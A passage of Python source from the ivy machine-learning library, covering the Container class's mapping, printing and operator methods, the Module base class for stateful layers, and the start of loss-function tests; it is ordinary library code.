def map(self, func, key_chains=None, to_apply=True, prune_unapplied=False, key_chain=''):
"""
Apply function to all array values of container
:param func: Function to apply to each container entry
:type func: python function
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param key_chain: Chain of keys for this dict entry
:type key_chain: str
:return: New container following the function mapped to each sub-array.
"""
return_dict = dict()
for key, value in sorted(self.items()):
this_key_chain = key if key_chain == '' else (key_chain + '/' + key)
if isinstance(value, Container):
ret = value.map(func, key_chains, to_apply, prune_unapplied, this_key_chain)
if prune_unapplied and not ret:
continue
return_dict[key] = ret
else:
if key_chains is not None:
if (this_key_chain in key_chains and not to_apply) or (
this_key_chain not in key_chains and to_apply):
if prune_unapplied:
continue
return_dict[key] = value
continue
return_dict[key] = func(value, this_key_chain)
# ToDo: find an elegant way to pass ALL configs from the current container to the new container
return Container(return_dict, **self._config)
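# Illustrative usage of map with key-chain filtering (comments only; the values are hypothetical):
#   cont = Container({'a': x, 'b': {'c': y}})
#   cont.map(lambda v, kc: v + 1)                                   applied to every leaf
#   cont.map(lambda v, kc: v + 1, key_chains=['b/c'])               applied to 'b/c' only, other leaves unchanged
#   cont.map(lambda v, kc: v + 1, ['b/c'], to_apply=False)          applied to everything except 'b/c'
#   cont.map(lambda v, kc: v + 1, ['b/c'], prune_unapplied=True)    leaves where the function was not applied are dropped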
def map_conts(self, func, key_chains=None, to_apply=True, prune_unapplied=False, include_self=True, key_chain=''):
"""
Apply function to all sub-contains in the container.
:param func: Function to apply to each sub-container
:type func: python function
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param include_self: Whether to also apply the (possibly in-place) function to this container. Default is True.
:type include_self: bool, optional
:param key_chain: Chain of keys for this dict entry
:type key_chain: str
:return: New container following the function mapped to each sub-container.
"""
return_dict = dict()
for key, value in sorted(self.items()):
this_key_chain = key if key_chain == '' else (key_chain + '/' + key)
if isinstance(value, Container):
ret = value.map_conts(func, key_chains, to_apply, prune_unapplied, key_chain=this_key_chain)
if prune_unapplied and not ret:
continue
return_dict[key] = ret
else:
if key_chains is not None:
if (this_key_chain in key_chains and not to_apply) or (
this_key_chain not in key_chains and to_apply):
if prune_unapplied:
continue
return_dict[key] = value
continue
return_dict[key] = value
ret = Container(return_dict, **self._config)
if key_chain != '' or include_self:
return func(ret, key_chain)
return ret
def dtype(self):
"""
Return container, with all entries replaced with their data types.
:return: New datatype container
"""
return self.map(lambda x, _: self._ivy.dtype(x))
def with_entries_as_lists(self):
"""
Return container object, with each array entry in the container cast to a list
"""
def to_list(x, _=''):
try:
return self._ivy.to_list(x)
except (AttributeError, ValueError):
return x
return self.map(to_list)
def reshape_like(self, target_dict, leading_shape=None, return_cont=None):
"""
Set shapes of container entries to shapes specified by new container with the same key structure
:return: new container with values of updated shapes
"""
leading_shape = self._ivy.default(leading_shape, list())
if return_cont is None:
return_cont = self.copy()
for (_, v_shape), (k, v) in zip(target_dict.items(), return_cont.items()):
if isinstance(v_shape, dict):
return_cont[k] = self.reshape_like(v_shape, leading_shape, return_cont[k])
else:
return_cont[k] = self._ivy.reshape(v, leading_shape + list(v_shape))
return Container(return_cont, **self._config)
def create_if_absent(self, key, value, inplace=True):
"""
Add a key to the container with corresponding value, if it is not already present. Otherwise, do nothing.
"""
if key in self:
return
self.set_at_key_chain(key, value, inplace)
def if_exists(self, key):
"""
Returns the sub-container at the following key if it exists, otherwise None.
"""
try:
return self[key]
except KeyError:
return
def try_kc(self, key):
"""
Tries the following key or key chain, returning self if not present.
"""
try:
return self[key]
except KeyError:
return self
def with_print_limit(self, print_limit):
return Container(self,
**{**self._config, **{'print_limit': print_limit,
'rebuild_child_containers': True}})
# noinspection PyTypeChecker
def remove_print_limit(self):
return self.with_print_limit(None)
def with_print_indent(self, print_indent):
return Container(self,
**{**self._config, **{'print_indent': print_indent,
'rebuild_child_containers': True}})
def with_print_line_spacing(self, print_line_spacing):
return Container(self,
**{**self._config, **{'print_line_spacing': print_line_spacing,
'rebuild_child_containers': True}})
# Built-ins #
# ----------#
def __repr__(self, as_repr=True):
indent_str = ' '*self._print_indent
def _align_array(array_str_in):
array_str_in_split = array_str_in.split('([')
leading_str_to_keep = array_str_in_split[0].replace('\\n', '')
indented_key_size = len(leading_str_to_keep.replace('"', '').split(': ')[0])
indented_key_str = ' '*(indented_key_size+2)
padded = False
def _pre_pad_alpha_line(str_in):
nonlocal padded
padded = True
return '\\n' + indent_str + indented_key_str + str_in
leading_str_to_keep = ', '.join([_pre_pad_alpha_line(s) if s[0].isalpha() and i != 0 else s
for i, s in enumerate(leading_str_to_keep.split(', '))])
local_indent_str = '' if padded else indent_str
leading_str = leading_str_to_keep.split('\\n')[-1].replace('"', '')
remaining_str = array_str_in_split[1]
num_extra_dims = 0
for i, char in enumerate(remaining_str):
if char != '[':
num_extra_dims = i
break
extra_indent = (len(leading_str) + 1 + num_extra_dims) * ' '
array_str_in = '(['.join([leading_str_to_keep, remaining_str])
uniform_indent_wo_overflow = array_str_in.replace('\\n[', '\n' + local_indent_str + extra_indent + '[')
uniform_indent = '\n'.join([local_indent_str + extra_indent + ' ' + s
if (s[0].isnumeric() or s[0] == '-' or s[0:3] == '...' or
max([ss in s[0:6] for ss in ['nan, ', 'inf, ']])) else
(indent_str + indented_key_str + s
if (not s[0].isspace() and s[0] != '"')
else s)
for s in uniform_indent_wo_overflow.split('\\n')])
indented = uniform_indent
# 10 dimensions is a sensible upper bound for the number of dimensions in a single array
for i in range(2, 10):
indented = indented.replace(' '*(i-1) + '['*i, '['*i)
indented = '\n'.join([s for s in indented.split('\n') if bool(s) and not s.isspace()])
return indented
def _align_arrays(str_in):
chunks = str_in.split('\n' + indent_str)
aligned_array_chunks = {i: _align_array(c) for i, c in enumerate(chunks) if '\\n' in c}
chunks = [aligned_array_chunks[i] if i in aligned_array_chunks else c_orig
for i, c_orig in enumerate(chunks)]
return ('\n' + indent_str).join(chunks)
new_dict = dict()
for k, v in self.items():
if isinstance(v, Container):
# noinspection PyArgumentList
rep = v.__repr__(as_repr=False)
else:
if self._ivy.is_array(v) and len(list(v.shape)) > 0 and _ivy.exists(self._print_limit) and \
_reduce(_mul, v.shape) > self._print_limit:
rep = (type(v), "shape=", list(v.shape))
elif isinstance(v, (list, tuple)) and v and self._ivy.is_array(v[0]):
rep = ("list[{}]".format(len(v)), type(v[0]), "shape=", list(v[0].shape))
else:
rep = v
new_dict[k] = rep
if as_repr:
json_dumped_str = _align_arrays(_json.dumps(
Container(new_dict, **self._config).map(
lambda x, kc: x if _is_jsonable(x)
else _repr(x).replace(' ', '').replace(',', ', ')).to_dict(),
indent=self._print_indent))
def _add_newline(str_in):
str_in_split = str_in.split('\n')
str_split_size = len(str_in_split)
return '\n'.join([('\n'*self._print_line_spacing + ss) if i == (str_split_size-1) else ss
for i, ss in enumerate(str_in_split)])
json_dumped_str = '":'.join([_add_newline(s) for s in json_dumped_str.split('":')])
# improve tf formatting
if _ivy.framework_stack and _ivy.current_framework_str() == 'tensorflow':
json_dumped_str_split = json_dumped_str.split("\'Variable:")
json_dumped_str = json_dumped_str_split[0] + ', ' + ', '.join(["\'".join(ss.split("\'")[1:])
for ss in json_dumped_str_split[1:]])
json_dumped_str = json_dumped_str.replace(':shape', ', shape').replace(')dtype=', '), dtype=').replace(
', ),', ',),')
# make keys green
json_dumped_str_split = json_dumped_str.split('":')
split_size = len(json_dumped_str_split)
json_dumped_str =\
'":'.join([' "'.join(sub_str.split(' "')[:-1] + [termcolor.colored(sub_str.split(' "')[-1], 'green')])
if i < split_size - 1 else sub_str
for i, sub_str in enumerate(json_dumped_str_split)])
# remove quotation marks, shape tuple, and color other elements of the dict
ret = json_dumped_str.replace('"', '').replace(", 'shape=', [", " shape=[").replace(
':', termcolor.colored(':', 'magenta')).replace('{', termcolor.colored('{', 'blue')).replace(
'}', termcolor.colored('}', 'blue')).replace('shape=', termcolor.colored('shape=', 'magenta')).replace(
'device=', termcolor.colored('device=', 'magenta')).replace("<class'", "<class '").replace(
"'", "").replace('<class', '<' + termcolor.colored('class', 'blue'))
# ToDo: make the solution below more elegant
for i in range(10):
ret = ret.replace('diff_{}'.format(i), termcolor.colored('diff_{}'.format(i), 'red'))
for keyword, color in self._keyword_color_dict.items():
ret = ret.replace(keyword, termcolor.colored(keyword, color))
return ret
return new_dict
def __dir__(self):
return list(super.__dir__(self)) + list(self.keys())
def __getattr__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
# noinspection PyUnresolvedReferences
return super.__getattr__(item)
def __setattr__(self, name, value):
if name[0] != '_':
self[name] = value
else:
super.__setattr__(self, name, value)
def _get_queue_item(self, query):
if isinstance(query, int):
queue_queries = [query]
elif isinstance(query, slice):
queue_queries = list(range(query.start, query.stop, _ivy.default(query.step, 1)))
elif isinstance(query, (list, tuple)):
queue_queries = list(range(query[0].start, query[0].stop, _ivy.default(query[0].step, 1)))
else:
raise Exception('Invalid slice type, must be one of integer, slice, or sequences of slices.')
queue_idxs = set([_np.sum(q >= self._queue_load_sizes_cum).item() for q in queue_queries])
conts = list()
for i in queue_idxs:
if i not in self._loaded_containers_from_queues:
cont = Container(self._queues[i].get(timeout=self._queue_timeout), **self._config)
if _ivy.wrapped_mode():
cont = cont.to_ivy()
self._loaded_containers_from_queues[i] = cont
else:
cont = self._loaded_containers_from_queues[i]
conts.append(cont)
combined_cont = self._container_combine_method(conts)
idx = list(queue_idxs)[0]
offset = 0 if idx == 0 else self._queue_load_sizes_cum[idx - 1]
if isinstance(query, int):
shifted_query = query - offset
elif isinstance(query, slice):
shifted_query = slice(query.start-offset, query.stop-offset, query.step)
elif isinstance(query, (list, tuple)):
shifted_query = tuple([slice(slc.start-offset, slc.stop-offset, slc.step) for slc in query])
# noinspection PyUnboundLocalVariable
return combined_cont[shifted_query]
def __getitem__(self, query):
"""
Get slice, key or key chain of container object.
:param query: slice object, key or key chain to query all container elements.
:type query: slice or str
:return: Container object at desired query.
"""
if isinstance(query, str):
if '/' in query or '.' in query:
return self.at_key_chain(query)
return dict.__getitem__(self, query)
elif _ivy.exists(self._queues):
return self._get_queue_item(query)
return_dict = dict()
for key, value in sorted(self.items()):
if isinstance(value, Container):
return_dict[key] = value[query]
else:
# noinspection PyBroadException
if isinstance(value, list) or isinstance(value, tuple):
if len(value) == 0:
return_dict[key] = value
else:
return_dict[key] = value[query]
elif value is None or hasattr(value, 'shape') and value.shape == ():
return_dict[key] = value
else:
return_dict[key] = value[query]
return Container(return_dict, **self._config)
def __setitem__(self, query, val):
"""
Set key or key chain of container object.
:param query: slice object, key or key chain at which to set all container elements.
:type query: slice or str
:param val: The value to set at the desired query.
:type val: ivy.Container, array, or other
:return: New container after updating.
"""
if isinstance(query, str) and ('/' in query or '.' in query):
return self.set_at_key_chain(query, val, inplace=True)
else:
return dict.__setitem__(self, query, val)
def __contains__(self, key):
if isinstance(key, str) and ('/' in key or '.' in key):
return self.has_key_chain(key)
else:
return dict.__contains__(self, key)
def __pos__(self):
return self
def __neg__(self):
return self.map(lambda x, kc: -x)
def __pow__(self, power):
if isinstance(power, Container):
return self.reduce([self, power], lambda x: _reduce(_pow, x))
return self.map(lambda x, kc: x ** power)
def __rpow__(self, power):
return self.map(lambda x, kc: power ** x)
def __add__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], sum)
return self.map(lambda x, kc: x + other)
def __radd__(self, other):
return self + other
def __sub__(self, other):
if isinstance(other, Container):
return self.reduce([self, -other], sum)
return self.map(lambda x, kc: x - other)
def __rsub__(self, other):
return -self + other
def __mul__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_mul, x))
return self.map(lambda x, kc: x * other)
def __rmul__(self, other):
return self * other
def __truediv__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_truediv, x))
return self.map(lambda x, kc: x / other)
def __rtruediv__(self, other):
return self.map(lambda x, kc: other / x)
def __floordiv__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_floordiv, x))
return self.map(lambda x, kc: x // other)
def __rfloordiv__(self, other):
return self.map(lambda x, kc: other // x)
def __abs__(self):
return self.map(lambda x, kc: self._ivy.abs(x))
def __lt__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_lt, x))
return self.map(lambda x, kc: x < other)
def __le__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_le, x))
return self.map(lambda x, kc: x <= other)
def __eq__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_eq, x))
return self.map(lambda x, kc: x == other)
def __ne__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_ne, x))
return self.map(lambda x, kc: x != other)
def __gt__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_gt, x))
return self.map(lambda x, kc: x > other)
def __ge__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_ge, x))
return self.map(lambda x, kc: x >= other)
def __and__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: x[0] and x[1])
return self.map(lambda x, kc: x and other)
def __rand__(self, other):
return self.map(lambda x, kc: other and x)
def __or__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: x[0] or x[1])
return self.map(lambda x, kc: x or other)
def __ror__(self, other):
return self.map(lambda x, kc: other or x)
def __invert__(self):
return self.map(lambda x, kc: _not(x))
def __xor__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: x[0] != x[1])
return self.map(lambda x, kc: x != other)
def __rxor__(self, other):
return self.map(lambda x, kc: other != x)
# Getters and Setters #
# --------------------#
# private
@property
def _ivy(self):
return _ivy.default(self._local_ivy, _ivy)
@_ivy.setter
def _ivy(self, local_ivy):
self._local_ivy = local_ivy
# public
@property
def shape(self):
"""
The shape of the arrays in the container, with None placed in indices which are not consistent across arrays
"""
return self._get_shape()
@property
def shapes(self):
"""
The shapes of each array in the container, with None placed in leaf entries without a shape attribute.
"""
return self._get_shapes()
@property
def dev_str(self):
"""
The device to which the arrays in the container belong, with None returned if the devices are not consistent
"""
return self._get_dev_str()
@property
def ivy(self):
return self._ivy
@property
def config(self):
return self._config
class MultiDevContainer(Container):
def __init__(self, dict_in, dev_strs, queues=None, queue_load_sizes=None, container_combine_method='list_join',
queue_timeout=None, print_limit=10, print_indent=4, print_line_spacing=0, ivyh=None,
keyword_color_dict=None, rebuild_child_containers=False, **kwargs):
super().__init__(dict_in, queues, queue_load_sizes, container_combine_method, queue_timeout, print_limit,
print_indent, print_line_spacing, ivyh, keyword_color_dict, rebuild_child_containers, **kwargs)
self._dev_strs = dev_strs
self._num_devs = len(dev_strs)
def at_dev(self, dev_str):
return self.map(lambda x, kc: x[dev_str] if isinstance(x, _ivy.MultiDevItem) else x)
def at_devs(self):
return {ds: self.at_dev(ds) for ds in self._dev_strs}
```
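The container methods above are easiest to see with a small usage sketch. The snippet below is illustrative only: the method names follow the definitions in this file, but the backend-setting call and example values are assumptions and may differ between ivy versions.

```python
import numpy as np
import ivy
from ivy.core.container import Container

# assumption: the old-style framework handler is available; later versions renamed this to set_backend
ivy.set_framework('numpy')

# build a nested container from plain numpy arrays
cont = Container({'a': np.array([1., 2., 3.]),
                  'b': {'c': np.array([4., 5., 6.])}})

# key-chain querying, as implemented by at_key_chain / __getitem__ above
sub = cont.at_key_chain('b/c')     # array stored at b -> c
same = cont['b/c']                 # equivalent, via __getitem__

# map applies a function to every leaf and returns a new container
doubled = cont.map(lambda x, kc: x * 2)

# pruning and setting by key chain
pruned = cont.prune_key_chain('b/c')
updated = cont.set_at_key_chain('b/d', np.zeros(3))

ivy.unset_framework()
```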
#### File: ivy/neural_net_stateful/module.py
```python
import os
import abc
# local
import ivy
from ivy.core.container import Container
# Base #
# -----#
class Module(abc.ABC):
def __init__(self, dev_str=None, v=None, build_mode='on_init', compile_on_first_call=False, store_vars=True,
stateful=None, arg_stateful_idxs=None, kwarg_stateful_idxs=None, fallback_to_non_compiled=True,
dev_strs=None):
"""
Initialize Ivy layer, which is a stateful object consisting of trainable variables.
:param dev_str: device on which to create the module's variables 'cuda:0', 'cuda:1', 'cpu' etc.
:type dev_str: str, optional
:param v: Ivy container of trainable variables. Created internally by default.
:type v: ivy container, optional
:param build_mode: How the Module is built, either on initialization (now), explicitly by the user by calling
build(), or the first time the __call__ method is run. Default is on initialization.
:type build_mode: str, optional
:param compile_on_first_call: Whether to compile the network on the first forward pass. Default is False.
:type compile_on_first_call: bool, optional
:param store_vars: Whether or not to store the variables created. Default is True.
:type store_vars: bool, optional
:param stateful: The constant id stateful items to track as part of the forward pass.
Used when graph compiling, default is None.
:type stateful: seq of any, optional
:param arg_stateful_idxs: The nested argument indices of stateful items to track as part of the forward pass.
Used when graph compiling, default is None.
:type arg_stateful_idxs: seq of any, optional
:param kwarg_stateful_idxs: The nested keyword argument indices of stateful items to track as part of the
forward pass. Used when graph compiling, default is None.
:type kwarg_stateful_idxs: seq of any, optional
:param fallback_to_non_compiled: Whether to fall back to non-compiled forward call in the case that an error is
raised during the compiled forward pass. Default is True.
:type fallback_to_non_compiled: bool, optional
:param dev_strs: devices on which to distribute the module's variables 'cuda:0', 'cuda:1', 'cpu' etc.
:type dev_strs: sequence of str, optional
"""
valid_build_modes = ['on_init', 'explicit', 'on_call']
if build_mode not in valid_build_modes:
raise Exception('build_mode must be one of {} of type str, but found {} of type {}'.format(
valid_build_modes, build_mode, type(build_mode)))
self._dev_str = ivy.default(dev_str, ivy.default(lambda: dev_strs[0], ivy.default_device(), True))
self._dev_strs = ivy.default(dev_strs, [self._dev_str])
self._build_mode = build_mode
self._stateful = stateful
self._arg_stateful_idxs = arg_stateful_idxs
self._kwarg_stateful_idxs = kwarg_stateful_idxs
self._fallback_to_non_compiled = fallback_to_non_compiled
self._store_vars = store_vars
self._built = False
self._compiled = False
self._compiled_fn = None
self._compile_on_first_call = compile_on_first_call
self._v_in = v
self.v = v
if build_mode != 'on_init':
return
self.build()
# Private #
# --------#
def _fn_with_var_arg(self, fn, v_fn):
def new_fn(*a, with_grads=True, **kw):
if 'v' in kw.keys():
del kw['v']
v = v_fn(self.v)
if not with_grads:
v = v.stop_gradients()
return fn(*a, **kw, v=v)
new_fn.wrapped = True
return new_fn
def _find_variables(self, obj=None):
vs = Container()
# ToDo: add support for finding local variables, when JAX supports uniquely flagging variables
if isinstance(obj, Module) and obj is not self:
return obj.v
elif isinstance(obj, (list, tuple)):
for i, v in enumerate(obj):
ret = self._find_variables(v)
if ret:
vs['v' + str(i)] = ret
return vs
elif isinstance(obj, dict):
for k, v in obj.items():
ret = self._find_variables(v)
if ret:
vs[k[1:] if k[0] == '_' else k] = ret
return vs
elif not hasattr(obj, '__dict__'):
return vs
for k, v in obj.__dict__.items():
if v is not None and k[0:2] != '__':
ret = self._find_variables(v)
if ret:
vs[k[1:] if k[0] == '_' else k] = ret
return vs
@staticmethod
def _extract_v(v, keychain_mappings, orig_key_chain):
if v.has_key_chain(orig_key_chain):
ret_cont = v.at_key_chain(orig_key_chain)
else:
ret_cont = ivy.Container({})
for old_kc, new_kc in keychain_mappings.items():
if orig_key_chain in old_kc:
ret_cont = ret_cont.set_at_key_chain('/'.join(new_kc.split('/')[1:]), v.at_key_chain(new_kc))
return ret_cont
def _wrap_call_methods(self, keychain_mappings, key='', obj=None):
if isinstance(obj, Module) and obj is not self:
orig_key_chain = key[1:] if key[0] == '_' else key
obj.__call__ = self._fn_with_var_arg(obj.__call__,
lambda v_: self._extract_v(v_, keychain_mappings, orig_key_chain))
return
elif isinstance(obj, (list, tuple)):
for i, val in enumerate(obj):
self._wrap_call_methods(keychain_mappings, key + '/v' + str(i), val)
return
elif isinstance(obj, dict):
for k, val in obj.items():
k = (key + '/' + k) if key != '' else k
self._wrap_call_methods(keychain_mappings, k, val)
return
if not hasattr(obj, '__dict__'):
return
for k, val in obj.__dict__.items():
if k[0:2] == '__':
continue
k = (key + '/' + k) if key != '' else k
if val is not None:
self._wrap_call_methods(keychain_mappings, k, val)
return
@staticmethod
def _remove_duplicate_variables(vs):
vs_ids = vs.map(lambda x, kc: id(x))
ids = dict()
duplicate_keychains = list()
keychain_mappings = dict()
def unique_callback(x, kc):
ids[x] = kc
def found_dup_callback(x, kc):
duplicate_keychains.append(kc)
keychain_mappings[kc] = ids[x]
vs_ids.map(lambda x, kc: unique_callback(x, kc) if x not in ids else found_dup_callback(x, kc))
for dup_kc in duplicate_keychains:
vs = vs.prune_key_chain(dup_kc)
return vs, keychain_mappings
# Overridable #
# noinspection PyMethodMayBeStatic,PyUnusedLocal
def _create_variables(self, dev_str):
"""
Create internal trainable variables, and return as an arbitrary nested dict. Overridable.
:param dev_str: The device string, specifying the device on which to create the variables.
:type dev_str: string
"""
return {}
def _build(self, *args, **kwargs) -> bool:
"""
Build the internal layers and variables for this module. Overridable.
Return False or empty Container if the build only partially completed (i.e. some child Modules have
"on_call" build mode). Alternatviely, return True or a container of the built variables if the module is built.
"""
return True
# Abstract #
@abc.abstractmethod
def _forward(self, *args, **kwargs):
"""
Forward pass of the layer, called after handling the optional input variables.
"""
raise NotImplementedError
def _call(self, *args, v=None, with_grads=True, **kwargs):
"""
The forward pass of the layer, treating the layer instance as a callable function.
"""
if not self._built:
self.build(*args, **kwargs, from_call=True)
if v is not None:
v_orig = self.v
if not with_grads:
v = v.stop_gradients()
self.v = Container(v)
ret = self._forward(*args, **kwargs)
self.v = v_orig
return ret
elif hasattr(self.__call__, 'wrapped'):
return self.__call__(*args, with_grads=with_grads, **kwargs)
elif not with_grads:
v_orig = self.v
self.v = v_orig.stop_gradients()
ret = self._forward(*args, **kwargs)
self.v = v_orig
return ret
return self._forward(*args, **kwargs)
# Public #
# -------#
def compile_graph(self, *args, v=None, with_grads=True, stateful=None, arg_stateful_idxs=None,
kwarg_stateful_idxs=None, include_generators=True, **kwargs):
stateful = ivy.default(stateful, self._stateful)
arg_stateful_idxs = ivy.default(arg_stateful_idxs, self._arg_stateful_idxs)
kwarg_stateful_idxs = ivy.default(kwarg_stateful_idxs, self._kwarg_stateful_idxs)
if not self._built:
if self._build_mode == 'on_call':
self(*args, v=v, with_grads=with_grads, **kwargs)
elif self._build_mode == 'explicit':
self.build(*args, from_call=False, **kwargs)
elif self._build_mode == 'on_init':
raise Exception('ivy.Module constructor was called but module was not built despite '
'on_init mode being set.')
else:
raise Exception('invalid build_mode, must be one of [ on_call | explicit | on_init ]')
kwargs['v'] = ivy.default(v, self.v)
kwargs['with_grads'] = with_grads
self._compiled_fn = ivy.compile_graph(
self._call, *args, **kwargs, stateful=stateful, arg_stateful_idxs=arg_stateful_idxs,
kwarg_stateful_idxs=kwarg_stateful_idxs, include_generators=include_generators)
self._compiled = True
def show_graph(self, *args, v=None, with_grads=True, stateful=None, arg_stateful_idxs=None,
kwarg_stateful_idxs=None, randomness_factor=0., save_to_disk=False, with_edge_labels=True,
with_arg_labels=True, with_output_labels=True, output_connected_only=True, include_generators=True,
fname=None, **kwargs):
self(*args, v=v, with_grads=with_grads, **kwargs) # for on call build modes
if not self._built:
self.build(*args, from_call=False, **kwargs) # for explicit build modes
kwargs['v'] = ivy.default(v, self.v)
kwargs['with_grads'] = with_grads
ivy.show_graph(self._call, *args, **kwargs, stateful=stateful, arg_stateful_idxs=arg_stateful_idxs,
kwarg_stateful_idxs=kwarg_stateful_idxs, randomness_factor=randomness_factor,
save_to_disk=save_to_disk, with_edge_labels=with_edge_labels, with_arg_labels=with_arg_labels,
with_output_labels=with_output_labels, output_connected_only=output_connected_only,
include_generators=include_generators, fname=fname)
def __call__(self, *args, v=None, with_grads=True, stateful=None, arg_stateful_idxs=None, kwarg_stateful_idxs=None,
**kwargs):
if self._compiled:
try:
return self._compiled_fn(*args, v=ivy.default(v, self.v), with_grads=with_grads, **kwargs)
except Exception as e:
if self._fallback_to_non_compiled:
return self._call(*args, v=v, with_grads=with_grads, **kwargs)
raise e
elif self._compile_on_first_call and not self._compiled:
self.compile_graph(*args, v=v, with_grads=with_grads, stateful=stateful,
arg_stateful_idxs=arg_stateful_idxs, kwarg_stateful_idxs=kwarg_stateful_idxs, **kwargs)
return self._compiled_fn(*args, v=ivy.default(v, self.v), with_grads=with_grads, **kwargs)
return self._call(*args, v=v, with_grads=with_grads, **kwargs)
def save_weights(self, weights_path):
"""
Save the weights on the Module.
:param weights_path: The hdf5 file for saving the weights.
:type weights_path: string
"""
os.makedirs('/'.join(weights_path.split('/')[:-1]), exist_ok=True)
self.v.to_disk_as_hdf5(weights_path)
def build(self, *args, from_call=False, dev_str=None, **kwargs):
"""
Build the internal layers and variables for this module.
"""
self._dev_str = ivy.default(dev_str, self._dev_str)
# return False if not from_call but build_mode is on_call
if not from_call and self._build_mode == 'on_call':
return self.v
# build local Module, and any child modules flagged with "explicit" build mode
built = ivy.default(self._build(*args, **kwargs), True)
# build variables based on locally built layers, if v not passed in constructor
v_from_constructor = self._v_in
if not ivy.exists(v_from_constructor):
vs = Container(dict(**self._find_variables(self), **self._create_variables(self._dev_str)))
self.v = vs
else:
self.v = self.v if isinstance(self.v, Container) else Container(self.v)
# remove duplicates
self.v, keychain_mappings = self._remove_duplicate_variables(self.v)
# build any child 'on_call' layers
if not built and from_call:
# update child modules to share the same device
for k, v in self.__dict__.items():
if isinstance(v, ivy.Module):
v._dev_str = self._dev_str
# build during forward pass
self._forward(*args, **kwargs)
# re-build variables based on additional child on-call layers, if v not passed in constructor
if not ivy.exists(v_from_constructor):
vs = Container(dict(**self._find_variables(self), **self._create_variables(self._dev_str)))
self.v = vs
# remove further duplicates with self.v
self.v, keychain_mappings = self._remove_duplicate_variables(self.v)
# set built flag
built = True
# wrap call methods if the module is fully built
if built:
self._wrap_call_methods(keychain_mappings, obj=self)
# flag built and remove local variables if specified
self._built = bool(built)
v_ret = self.v
if not self._store_vars:
# ToDo: verify variables in self.v are released once this method exits
self.v = ivy.Container()
return v_ret if bool(v_ret) or isinstance(built, bool) else built
# Properties #
# -----------#
@property
def build_mode(self):
return self._build_mode
@property
def built(self):
return self._built
```
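A minimal sketch of how the Module base class above is typically subclassed. This is illustrative rather than part of the library: the layer name and shapes are made up, and the ivy.variable / ivy.random_uniform / ivy.linear calls assume a backend has already been set.

```python
import ivy

# a hypothetical linear layer built on the Module base class defined above
class MyLinear(ivy.Module):
    def __init__(self, in_size, out_size, dev_str=None):
        self._in_size = in_size
        self._out_size = out_size
        super().__init__(dev_str)  # build_mode defaults to 'on_init', so _create_variables runs here

    def _create_variables(self, dev_str):
        # arbitrary nested dict of trainable variables, as _create_variables documents above
        return {'w': ivy.variable(ivy.random_uniform(shape=(self._out_size, self._in_size), dev_str=dev_str)),
                'b': ivy.variable(ivy.zeros([self._out_size], dev_str=dev_str))}

    def _forward(self, x):
        # self.v holds the variable container created during build()
        return ivy.linear(x, self.v.w, self.v.b)

# usage, assuming e.g. ivy.set_framework('torch') has been called:
#   layer = MyLinear(4, 2)
#   y = layer(ivy.random_uniform(shape=(1, 4)))
```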
#### File: test_nn/test_functional/test_losses.py
```python
import pytest
import numpy as np
# local
import ivy
import ivy.numpy
import ivy_tests.helpers as helpers
# cross_entropy
@pytest.mark.parametrize(
"t_n_p_n_res", [([[0., 1., 0.]], [[0.3, 0.2, 0.5]], [1.609438])])
@pytest.mark.parametrize(
"dtype_str", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross_entropy(t_n_p_n_res, dtype_str, tensor_fn, dev_str, call):
# smoke test
true, pred, true_target = t_n_p_n_res
pred = tensor_fn(pred, dtype_str, dev_str)
true = tensor_fn(true, dtype_str, dev_str)
ret = ivy.cross_entropy(true, pred)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == [1]
# value test
assert np.allclose(call(ivy.cross_entropy, true, pred), np.asarray(true_target))
# compilation test
if call in [helpers.torch_call]:
# cross_entropy does not have backend implementation,
# pytorch scripting requires direct bindings to work, which bypass get_framework()
return
if not ivy.wrapped_mode():
helpers.assert_compilable(ivy.cross_entropy)
# binary_cross_entropy
@pytest.mark.parametrize(
"t_n_p_n_res", [([[0., 1., 0.]], [[0.3, 0.7, 0.5]], [[0.35667494, 0.35667494, 0.69314718]])])
@pytest.mark.parametrize(
"dtype_str", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_binary_cross_entropy(t_n_p_n_res, dtype_str, tensor_fn, dev_str, call):
# smoke test
true, pred, true_target = t_n_p_n_res
pred = tensor_fn(pred, dtype_str, dev_str)
true = tensor_fn(true, dtype_str, dev_str)
ret = ivy.binary_cross_entropy(true, pred)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == pred.shape
# value test
assert np.allclose(call(ivy.binary_cross_entropy, true, pred), np.asarray(true_target))
# compilation test
if call in [helpers.torch_call]:
# binary_cross_entropy does not have backend implementation,
# pytorch scripting requires direct bindings to work, which bypass get_framework()
return
if not ivy.wrapped_mode():
helpers.assert_compilable(ivy.binary_cross_entropy)
# sparse_cross_entropy
@pytest.mark.parametrize(
"t_n_p_n_res", [([1], [[0.3, 0.2, 0.5]], [1.609438])])
@pytest.mark.parametrize(
"dtype_str", ['float32'])
